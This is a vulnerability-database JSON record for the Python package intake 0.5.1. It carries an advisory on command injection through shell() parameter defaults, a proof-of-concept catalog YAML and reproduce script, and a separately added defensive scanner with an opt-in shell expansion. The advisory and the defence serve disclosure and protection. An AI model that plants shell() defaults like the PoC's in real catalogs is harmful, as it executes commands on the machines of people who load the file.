{
  "url": "http://public2.vulnerablecode.io/api/packages/989341?format=json",
  "purl": "pkg:pypi/intake@0.5.1",
  "type": "pypi",
  "namespace": "",
  "name": "intake",
  "version": "0.5.1",
  "qualifiers": {},
  "subpath": "",
  "is_vulnerable": true,
  "next_non_vulnerable_version": null,
  "latest_non_vulnerable_version": null,
  "affected_by_vulnerabilities": [
    {
      "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90880?format=json",
      "vulnerability_id": "VCID-45gd-75f4-kuan",
      "summary": "Intake has a Command Injection via shell() Expansion in Parameter Defaults\n### Summary\nThe shell() syntax within parameter default values appears to be automatically expanded during the catalog parsing process.\nIf a catalog contains a parameter default such as shell(<command>), the command may be executed when the catalog source is accessed.\nThis means that if a user loads a malicious catalog YAML, embedded commands could execute on the host system.\nThis behavior could potentially be classified as OS Command Injection / Unsafe Shell Expansion.\n\n### Details\nThe issue appears to originate from how parameter default values are expanded when a catalog source is accessed.\n\nDuring catalog loading and source access:\n\nIntake resolves parameter default values\nThe function responsible for expanding defaults processes the shell() syntax\nThe shell expression triggers a subprocess execution\nBecause this occurs during catalog evaluation, the command may execute before the user explicitly interacts with the dataset itself.\n\nAffected logic appears to involve:\n```\nexpand_defaults()\n```\nand related parameter parsing mechanisms.\n\n\n### PoC\nexploit.yaml\n```\nmetadata:\n  version: 1\nsources:\n  rce_test:\n    driver: csv\n    description: \"Testing shell expansion in parameters\"\n    args:\n      urlpath: \"{{ cmd_exec }}\"\n    parameters:\n      cmd_exec:\n        display_name: \"Test Parameter\"\n        type: str\n        default: \"shell(touch /tmp/intake_rce_test)\"\n```\n\nreproduce.py\n```\nimport intake\nimport os\n\nPROOF_FILE = \"/tmp/intake_rce_test\"\n\nif os.path.exists(PROOF_FILE):\n    os.remove(PROOF_FILE)\n\nprint(f\"[*] Proof file exists before: {os.path.exists(PROOF_FILE)}\")\n\ntry:\n    cat = intake.open_catalog(\"exploit.yaml\")\n\n    print(\"Accessing source...\")\n    _ = cat[\"rce_test\"]\n\nexcept Exception as e:\n    print(f\" Error during execution: {e}\")\n\nif os.path.exists(PROOF_FILE):\n    print(f\" Command execution confirmed, Found: {PROOF_FILE}\")\nelse:\n    print(\"Command execution did not occur.\")\n```\n### Attack Scenario\nA potential attack scenario could be:\n\n1. An attacker publishes a malicious Intake catalog YAML file\n2. The victim downloads or loads the catalog\n3. The victim accesses a source entry in the catalog\n4. Parameter defaults are expanded\n5. The shell() expression triggers execution of the embedded command\n\n### Impact\n\nIf this behavior is confirmed to be unintended, an attacker could distribute a malicious catalog file via:\n\n- Git repositories\n- shared datasets\n- URLs\n- data science workflows\n- Any user loading the catalog could unknowingly execute commands with their local user privileges.\n\n### Recommendation\nPossible mitigations could include:\n\n- disabling shell() expansion by default\n- requiring an explicit opt-in flag (e.g., allow_shell=True)\n- restricting shell execution for catalogs loaded from untrusted sources\nPlease let me know if additional information or testing is needed.\nI'm happy to assist with further analysis or validation.",
      "references": [
        {
          "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33310",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {"value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10546", "published_at": "2026-06-06T12:55:00Z"},
            {"value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10446", "published_at": "2026-06-09T12:55:00Z"},
            {"value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10422", "published_at": "2026-06-08T12:55:00Z"},
            {"value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10508", "published_at": "2026-06-07T12:55:00Z"},
            {"value": "0.00034", "scoring_system": "epss", "scoring_elements": "0.10525", "published_at": "2026-06-05T12:55:00Z"}
          ],
          "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-33310"
        },
        {
          "reference_url": "https://github.com/intake/intake",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {"value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},
            {"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": ""}
          ],
          "url": "https://github.com/intake/intake"
        },
        {
          "reference_url": "https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {"value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},
            {"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": ""},
            {"value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-24T15:35:28Z/"}
          ],
          "url": "https://github.com/intake/intake/commit/d0c0b6b57c1cb3f73880655ded4a9b0e18e1fd1b"
        },
        {
          "reference_url": "https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {"value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},
            {"value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": ""},
            {"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": ""},
            {"value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-24T15:35:28Z/"}
          ],
          "url": "https://github.com/intake/intake/security/advisories/GHSA-37g4-qqqv-7m99"
        },
        {
          "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33310",
          "reference_id": "",
          "reference_type": "",
          "scores": [
            {"value": "8.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"},
            {"value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": ""}
          ],
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33310"
        },
        {
          "reference_url": "https://github.com/advisories/GHSA-37g4-qqqv-7m99",
          "reference_id": "GHSA-37g4-qqqv-7m99",
          "reference_type": "",
          "scores": [
            {"value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": ""}
          ],
          "url": "https://github.com/advisories/GHSA-37g4-qqqv-7m99"
        }
      ],
      "fixed_packages": [],
      "aliases": ["CVE-2026-33310", "GHSA-37g4-qqqv-7m99"],
      "risk_score": 4.0,
      "exploitability": "0.5",
      "weighted_severity": "8.0",
      "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-45gd-75f4-kuan"
    }
  ],
  "fixing_vulnerabilities": [],
  "risk_score": "4.0",
  "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/intake@0.5.1"
}
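Added example, not part of the VulnerableCode record or of intake's own code: the advisory's PoC and its "Recommendation" section together suggest two practical controls, a pre-load scan of a catalog for `shell()` parameter defaults, and a default-expansion routine that keeps `shell()` inert unless the caller opts in with `allow_shell=True`. The block below implements both against a constructed, already-parsed copy of the advisory's `exploit.yaml` (a plain dict, so no YAML library is needed to run it). The function names `scan_catalog`, `iter_shell_defaults` and `expand_default`, the `ShellExpansionRefused` exception, and the assumption that `client_shell(...)` is treated like `shell(...)` are this example's, not intake's API.

```python
"""Added example (not intake's code): flag shell() defaults in an Intake-style
catalog before loading it, and expand defaults without executing shell() unless
the caller explicitly opts in (the advisory's suggested allow_shell=True)."""
import re
import subprocess
from typing import Any, Iterator

# Assumption: both shell(...) and client_shell(...) spellings are treated as
# shell expansions; the regex catches either anywhere in a default value.
SHELL_RE = re.compile(r"(?:client_)?shell\((?P<cmd>.*)\)", re.DOTALL)

# Constructed input: the advisory's exploit.yaml as it would look after a safe
# YAML parse, plus one benign source so the scan has something to ignore.
SAMPLE_CATALOG = {
    "metadata": {"version": 1},
    "sources": {
        "rce_test": {
            "driver": "csv",
            "args": {"urlpath": "{{ cmd_exec }}"},
            "parameters": {
                "cmd_exec": {
                    "display_name": "Test Parameter",
                    "type": "str",
                    "default": "shell(touch /tmp/intake_rce_test)",
                }
            },
        },
        "benign": {
            "driver": "csv",
            "args": {"urlpath": "{{ path }}"},
            "parameters": {"path": {"type": "str", "default": "env(HOME)"}},
        },
    },
}


def iter_shell_defaults(catalog: dict) -> Iterator[tuple[str, str, str]]:
    """Yield (source, parameter, command) for every parameter default that a
    shell() expansion would execute. Walks sources.<name>.parameters.<p>.default,
    the location the advisory's PoC uses."""
    for src_name, src in (catalog.get("sources") or {}).items():
        for p_name, spec in (src.get("parameters") or {}).items():
            default = spec.get("default") if isinstance(spec, dict) else None
            if isinstance(default, str):
                match = SHELL_RE.search(default)
                if match:
                    yield src_name, p_name, match.group("cmd")


def scan_catalog(catalog: dict) -> list[str]:
    """Return one finding per shell() default; an empty list means none found."""
    return [
        f"{src}.parameters.{param}: default runs shell command {cmd!r}"
        for src, param, cmd in iter_shell_defaults(catalog)
    ]


class ShellExpansionRefused(RuntimeError):
    """Raised when a shell() default is met without allow_shell=True."""


def expand_default(value: Any, *, allow_shell: bool = False) -> Any:
    """Hardened default expansion: shell() is refused unless allow_shell=True.
    Other forms (e.g. env(...)) are out of scope here and returned verbatim."""
    if not isinstance(value, str):
        return value
    match = SHELL_RE.fullmatch(value.strip())
    if match is None:
        return value
    if not allow_shell:
        raise ShellExpansionRefused(
            f"refusing to execute shell() default {value!r}; "
            "pass allow_shell=True only for catalogs you trust"
        )
    # Opt-in path: run the command as the expansion would, capturing stdout.
    result = subprocess.run(
        match.group("cmd"), shell=True, capture_output=True, text=True, check=False
    )
    return result.stdout.strip()


if __name__ == "__main__":
    for finding in scan_catalog(SAMPLE_CATALOG):
        print("[!]", finding)
    try:
        expand_default("shell(touch /tmp/intake_rce_test)")
    except ShellExpansionRefused as exc:
        print("[ok]", exc)
```

Run the scan on any catalog fetched from a repository, URL or shared dataset before handing it to the catalog loader; a non-empty result is the signal to refuse the file or review it by hand. The opt-in expansion mirrors the advisory's recommendation: the dangerous behaviour still exists, but only a deliberate `allow_shell=True` from the caller reaches it.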